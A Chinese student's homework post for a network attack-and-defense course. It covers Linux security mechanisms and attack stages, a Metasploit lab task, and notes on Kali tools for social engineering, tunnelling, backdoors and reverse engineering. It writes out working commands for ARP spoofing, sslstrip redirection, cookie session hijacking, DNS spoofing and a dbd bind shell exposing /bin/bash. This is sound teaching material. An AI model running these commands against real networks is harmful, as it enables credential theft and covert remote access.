任務一、教材學習

掌握Linux系統架構
掌握Linux系統安全架構和機制
掌握Linux系統安全攻防技術
本章通過介紹Linux的結構和安全機制，引出了對Linux系統的攻擊過程，包括首先從遠程侵入主機，然后在本地獲得權限，并提升權限、消蹤滅跡和植入后門的過程。并根據攻擊的過程提出相應的防御策略，通過工具和具體示例介紹更加容易讓人理解。
Linux系統具有以下優點：1、跨平臺的硬件支持。2、豐富的軟件支持。3、多用戶多任務。4、可靠的安全性。5、良好的穩定性。6、完善的網絡功能。

一、Linux操作系統基本框架

Linux優勢：跨平臺的硬件支持、豐富的軟件支持、多用戶多任務、可靠的安全性、良好的穩定性、完善的網絡功能

Linux系統結構包括Linux內核，一些GNU運行庫和工具，命令行Shell，圖形界面X窗口系統及相應桌面環境。在硬件抽象層之上是內核服務功能模塊，包括進程管理、內存管理、文件系統、設備控制與網絡這五個子系統；而這些內核模塊通過系統調用接口向用戶態的GNU運行庫及工具、命令行Shell、X窗口以及應用軟件提供服務。

二、Linux操作系統安全機制

Linux身份認證機制：Linux用戶、linux用戶組、Linux的本地登陸用戶認證機制、Linux的遠程登陸用戶認證機制、Linux的統一身份認證中間件-PAM
Linux授權與訪問控制機制：文件所有者、文件的訪問權限、文件的特殊執行權限、Linux訪問機制的不足及改進
Linux安全審計機制：連接時間日志、進程控制日志、錯誤日志記錄

三、Linux系統遠程攻防技術

攻擊者在通過遠程滲透技術獲得訪問權后，就會轉入本地攻擊，以求獲得更高的權限。這些技術包括本地特權提升，在系統上消蹤滅跡，遠程控制后門程序。

Linux遠程口令字猜測攻擊:針對ssh、telnet、ftp、http等服務的口令猜測攻擊是互聯網所面臨的攻陷系統最普遍的攻擊模式。

安全防御措施：使用不宜猜中的強口令字

Linux網絡服務遠程滲透攻擊
安全防范措施：

禁用所有不必要的網絡服務
盡量選擇更安全的網絡協議與服務軟件，并使用最佳安全實踐進行部署
及時更新網絡服務版本
使用xinetd、防火墻為linux網絡服務添加網絡訪問控制機制
建立入侵檢測與應急響應計劃流程
攻擊Linux客戶端程序和用戶
安全防范措施：及時更新常用的網絡客戶端軟件;自身安全意識、經驗與心智能力

攻擊Linux路由器和監聽器:攻擊linux路由器與防火墻

四、Linux系統本地安全攻防技術

Linux本地特權提升
Linux系統上的消蹤滅跡:清理系統上的日志記錄，從而有效地抹掉自己的行動蹤跡
Linux系統遠程控制后門程序:linux系統上植入遠程控制后門程序的類型包括特洛伊木馬化的系統程序、命令行后門工具以及圖形化后門工具

任務二、實踐練習

在Metasploit滲透攻擊框架軟件中尋找一個針對Linux系統服務的滲透攻擊模塊，在網絡安全攻防實驗環境中部署有漏洞的環境（如滲透利用第三方網絡服務，需要找到并安裝存在特定漏洞的版本），并使用metasploit進行攻擊。
攻擊方使用Metasploit滲透軟件針對Linux Metasploitable靶機實施網絡攻擊，防御方則在Metasploitatble上使用Tcpdump或Wireshark或Snort工具捕獲攻擊流，并分析出攻擊者利用了哪個安全漏洞進行攻擊，從官方網站上下載該安全漏洞補丁進行系統修補，雙方合作給出攻防過程報告。

任務三、kali視頻學習

KaliSecruity-漏洞利用之SET

SET是一個開源、Python驅動的社會工程學滲透測試工具，提供了非常豐富的攻擊向量庫。是開源的社會工程學利用的套件，通常結合metasploit來使用。輸入setoolkit命令，發現找不到該命令，上網查找原因是需要下載安裝，
網址是git clone https://github.com/trustedsec/social-engineer-toolkit/ set/



1）魚叉式釣魚攻擊（Spear-Phishing Attack Vectors）

2）網站攻擊（Website Attack Vectors）

3）介質感染攻擊（Infectious Media Generator）

4）創建Payload并監聽（Create a Payload and Listener）

5）群發郵件攻擊（Mass Mailer Attack）

6）基于Arduino的攻擊（Arduino-Based Attack Vector）

7）無線接入點攻擊（Wireless Access Point Attack Vector）

8）二維碼攻擊（QRCode Generator Attack Vector）

9）powershell攻擊（Powershell Attack Vectors）

10）短信欺騙攻擊（SMS Spoofing Attack Vector）

11）第三方模塊（Third Party Modules）

1、魚叉式釣魚攻擊

此攻擊向量主要目的為發送存在惡意軟件的釣魚郵件。

2、介質感染攻擊

借助Autorun.inf執行Exploit得到一個返回的shell，也可以結合Metasploit的后門

3、創建Payload和監聽器

創建一個返回的Payload并開啟監聽，可以看到以下后門，與Metasploit給出的后門類似：

4、群發郵件攻擊

支持導入列表并向列表中的每個人發送郵件

5、基于Andruino的攻擊

6、無線接入點攻擊（Wireless Access Point Attack Vector）

無線接入點攻擊會創建一個虛擬無線AP，通過接入點ap可以抓取所有連接進來的設備流量。

7、二維碼攻擊（QRCode Generator Attack Vector）

填入一個危險的URL，使得被攻擊者掃描二維碼自動訪問頁面而中招。這里掃描百度網址，但沒有掃到和二維碼相關的圖片。

8、powershell攻擊（Powershell Attack Vectors）

9、短信欺騙攻擊（SMS Spoofing Attack Vector）

10、第三方模塊（Third Party Modules）

kaliSecurity嗅探欺騙與中間人攻擊

Linux下的中間人攻擊套路是一樣的，這里介紹進行ARP欺騙、DNS欺騙和嗅探以及會話劫持的方法。

1、為Kali設置開啟端口轉發

echo 1 > /proc/sys/net/ipv4/ip_forward
cat /proc/sys/net/ipv4/ip_forward 修改為1

2、設置ssltrip

為了劫持SSL數據，需要https數據變為http：
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8081
讓sslrtip在8081端口監聽：sslstrip -l 8081

3、ettercap的準備

ettercap是一套用于中間人攻擊的工具。和dsniff套件齊名。支持插件和過濾腳本，直接將賬號、密碼顯示出來，不用人工提取數據。如果是第一次中間人攻擊操作，那么要對kali下的etteracp做點配置。找到路徑為 /etc/ettercap的etter.conf文件，打開文件，將其中的etc_uid和etc_gid均改為0，并將下面Linux分類下的if you use iptables這一行，將注釋去掉，保存退出即可打開。

4、Ettercap使用

輸入ettercap -G，打開圖形化界面。選擇嗅探網卡 默認eth0。在hosts下選擇先scan for hosts掃描內網信息，發現有135臺主機被加入主機列表。

5、Dsniff套裝介紹

Dsniff套裝主要是arpspoof和dsniff，前者用來進行arp欺騙，后者用于嗅探。進行攻擊步驟如下：
進行arp欺騙：
arpspoof [-i interface（網卡）] [-c own|host|both（欺騙方式，通常是both）] [-t target（目標）] [-r] host（網關）
進行嗅探：
dsniff [-cdmn] [-i interface | -p pcapfile] [-s snaplen] [-f services] [-t trigger[,...]] [-r|-w savefile] [expression]
-c打開半雙工TCP流，允許在使用arpspoof時進行正確的嗅探操作；
-d啟動調試模式；
-f以/etc/service格式從文件中加載觸發器（也就是口令嗅探的服務類型）；
-I使用特定的網絡接口；
-m使用dsniff.magic文件通過在magic文件中定義的特征嘗試自動判斷協議；
-n不執行主機查找；
-r從前面保存的會話中讀取被嗅探的數據；
-s最多對報文的前個字節進行嗅探，如果用戶名和口令信息包含在隨后的默認1024字節界限中；
-t使用格式port/proto=servise；來加載一個以逗號界定的觸發器集；

6、會話劫持

這里主要以cookies進行舉例，說明會話劫持的用法。
開始arp欺騙；
arpspoof -i wlan0 -t 192.168.1.1 192.168.1.102
捕獲數據報：
tcpdump -i wlan -w test.cap
等一段時間，估計目標會登錄網站了，我們開始處理捕獲的數據包：
forret -r test.cap
如果捕獲的數據包沒什么問題，而且確定開啟了端口轉發，那么經過處理的數據包會自動生成hamster.txt
接下來運行hamster hamster
會提示瀏覽器設置代理為http://127.0.0.1:1234
接著在瀏覽器中代開hamster：
http://hamster
選擇目標和可能的登錄認證地址，然后點擊鏈接會發現劫持成功。

7、圖片截獲

利用Driftnet這款工具我們可以看到受害人在訪問網站的圖片。
首先依然使用arpspoof啟動arp欺騙，然后啟動driftnet：
driftent -i
此時彈出一個小窗口，當目標訪問有圖片的網站的時候，攻擊者就能在這個小窗口看到。

8、DNS欺騙

利用Dsniff套裝中的dnsspoof或者ettercap的dnsspoof插件，我們可以完成對受害者的dns欺騙。
在開始欺騙前，首先我們要編輯一個自己的hosts文件，放在方便訪問的地方。內容和本機自帶的hosts內容差不多，只是把你想欺騙的域名和想要欺騙到哪里的地址寫好（通常是攻擊者指定的服務器，用來執行瀏覽器溢出或者java applet攻擊，用來獲取受害者的計算機訪問權限）
host文件：
127.0.0.1 www.baidu.com
上面是一個hosts文件示例，把百度定向到了本機。我們把它保存成hosts，位于/root目錄下。
然后啟動dnsspoof：
dnsspoof -i wlan0 -f /root/hosts
等受害者訪問百度觀察效果。

9、URL監控

利用Dsniff套裝中的urlsnarf工具，我們對TCP80、3128、8080端口的HTTP通信進行解析，并且可以將嗅探到的所有HTTP請求轉存為通用日志格式（Common Log Format，CLF），這種格式是許多Web服務器所使用的，例如IIS和Apache，事后可以很方便的使用一些日志分析工具來分析記錄結果。
Usage：urlsnarf [-n] [-i interface | -p pcapfile] [[-v] pattern [expression]]

10、下載軟件監控

利用Dsniff套裝中的filesnarf工具，我們可以從嗅探到的NFS通信中，選定某個文件，轉存到本地當前工作目錄。
Ussage：filesnarf [-i interface | -p pcapfile] [[-v] pattern [expression]]

kaliSecurity權限維持之后門

權限維持包含Tunnel工具集、Web后門、系統后門三個子類。其中系統后門與web后門統稱后門，都是為滲透測試后，為方便再次進入系統而留下的惡意程序。

1、Weevely

Weevely是一款使用python編寫的webshell工具，可以算作是linux下的一款菜刀替代工具。

2、WeBaCoo

WeBaCoo（Web Backdoor Cookie）script-kit是一個小巧的、隱蔽的php后門，它提供了一個可以連接遠程web服務器并執行php代碼的終端。WeBaCoo使用HTTP響應頭傳送命令結果，shell命令經base64編碼后隱藏在Cookie頭中。

3、dbd

加密版的nc
監聽端：dbd -l -p 2333 -e /bin/bash -k password
連接端：dbd 127.0.0.1 2333 -k password

4、sbd

與dbd使用方法類似

kaliSecurity權限維持之Tunnel

權限維持包含Tunnel工具集、Web后門、系統后門三個子類。Tunnel工具集包含了一系列用于創建通信隧道、代理的工具。

1、Cryptcat

Cryptcat是Netcat的加密版本，與Dbd、Sbd使用類似。Cryptcat支持TCP、UDP兩種網絡協議，它可以在兩個計算機之間建立指定的連接，并使用特定的密鑰對傳輸數據進行加密。為了提高加密，該工具允許用戶在每次連接使用自定義的密鑰，從而保證數據的安全性。

2、DNS2TCP

該技術一般為透明http代理，如果你沒有賬號就無法上網。但提供熱點的ISP對熱點的DNS查詢服務并不作限制，你會發現獲取到的dns地址是有效的，并且可以進行dns查詢，這時可以使用DNS tunnel技術來實現免費上網。DNS tunnel 即 DNS 通道，就是利用DNS查詢過程建立起隧道以傳輸數據。

3、Miredo

Miredo是一個網絡工具，主要用于BSD和Linux的IPV6 Teredo隧道鏈接，可以轉換不支持IPV6的網絡連接IPV6，內核中需要有IPV6和TUN隧道支持。

4、Proxychains

Proxychains 是內網滲透測試經常會用到一款代理工具，能夠強制使任何應用的TCP連接使用SOCKS4,SOCKS或者HTTP(S)代理進行連接，配置文件位于/etc/proxychains.conf

5、Proxytunnel

Proxytunnel可通過標準的HTTPS代理來連接遠程服務器，這是一個代理，實現了橋接的功能。特別用于通過SSH進行HTTP（S）傳輸。

6、ptunnel

借助icmp數據包建立隧道通信。

7、pwnat

內網下通過udp通信。

8、socat

可以在不同協議上進行轉發數據。

9、sslh

是一個ssl/ssh端口復用工具，sslh可以在同一個端口上接受https，ssh和openvpn連接，這使得通過443端口連接ssh服務器或者openvpn服務同時在該端口上提供https服務成為可能，sslh可以作為一個研究端口復用的例子。

kaliSecurity逆向工程工具

逆向工程是根據已有的東西和結果，通過分析來推導出具體的實現辦法。比如看到別人寫的某個exe程序能夠做出某種漂亮的動畫效果，你通過反匯編、反編譯和動態跟蹤等方法，分析出其動畫效果的實現過程，這種行為就是逆向工程：不僅僅是反編譯，而且還要推導出設計，并且文檔化，逆向軟件工程的目的是使軟件得以維護。

1、Edb-Debugger

EDB是一個基于Qt4開發的二進制調試工具，主要是為了跟OllyDbg工具看齊，通過插件體系可以進行功能的擴充，當前只支持Linux。可以將文件直接拖進來，或使用頂部的下拉菜單的File菜單，然后選擇open，將可執行文件加載到Edb-Debugger中進行調試。

2、Ollydbgs

經典的Ring3級調試器，是一個動態調試工具，將IDA與SoftICE結合起來的思想。在Kali下是Wine方式運行的Ollydbg。

3、jad

Java反編譯工具

4、Radare2

是一款開放源代碼的逆向工程平臺,它可以反匯編、調試、分析和操作二進制文件。

5、Recstudio

反編譯工具

6、APKTool

GOOGLE提供的APK編譯工具，能夠反編譯及回編譯apk，同時安裝反編譯系統apk所需要的framework-res框架，清理上次反編譯文件夾等功能。

7、Clang、Clang++

Clang是一個C語言、C++、Objective-C、Objective-C++語言的輕量級編譯器,類似于gcc編譯器；

Clang++是clang的另一個升級版本，使用方法其實都是一樣的,類似于gc++編譯器。

8、D2j-des2jar

反匯編dex文件到jar文件,進而可以使用其他工具查看源代碼。

9、Flasm

主要用于直接修改swf文件里的腳本actionscript。swf轉fla文件的軟件不能確保100%還原，如果只是修改as腳本代碼，flasm是最佳的選擇，因為他只修改腳本，資源數據不做修改。

10、Javasnoop

一個java應用程序安全測試工具，允許以攔截的方法，篡改數據和hack運行在你計算機上的java應用程序。通常在沒有源代碼的情況下，測試java客戶端的安全性最好的結果是不可預知的，最壞的結果是不切實際的。

轉載于:https://www.cnblogs.com/keady/p/10710673.html

總結

以上是生活随笔為你收集整理的2018-2019-2 20189201 《网络攻防实践》第八周作业的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。